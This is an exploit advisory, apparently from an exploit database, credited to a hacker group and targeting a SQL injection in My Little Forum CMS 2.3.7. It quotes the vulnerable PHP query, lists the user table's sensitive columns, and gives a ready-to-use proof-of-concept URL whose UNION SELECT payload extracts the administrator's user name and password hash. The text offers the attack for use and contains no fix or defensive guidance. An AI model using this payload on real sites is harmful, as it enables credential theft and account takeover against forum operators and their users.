################################################################################ # Exploit Title:My Little Forum CMS 2.3.7 SQL Injection # # Google Dork: Get Your Own! # # Exploit Author:Black Termites Security Group # # Vendor Homepage:http://mylittleforum.net/ # # Discovered by: Sh4dow # # Official Channel:Https://telegram.me/Termites # # We Are:Sh4dow - SOLTAn SILENT - AVI Hacker - M-R3dH4t - Sorena - HashoR # ##------------------------------------------------------------------------------------------------------------------------## # GoogleDork: Get your own! # # Vulnerable Code (index.php): #(--> mysqli_query $user_result = mysqli_query($connid, "SELECT user_name FROM " . #$db_settings['userdata_table'] . " WHERE user_id='" . $selected[$x] . "' LIMIT 1"); <--) #Tables:(user_type, user_name, user_real_name, # user_pw, user_email, user_hp, user_location, email_contact, last_login, # last_logout, user_ip, registered, user_view, fold_threads, signature, profile, #auto_login_code, pwf_code, activate_code, entries_read) # # PoC: http://Site.com/forum/index.php?id=-999' UNION SELECT 0,0,user_name, # user_pw,0,0,0,0,0,0,0 FROM forum_userdata where user_id=1 /* # # <*Iranian Underground Researchers /*> #################################################################################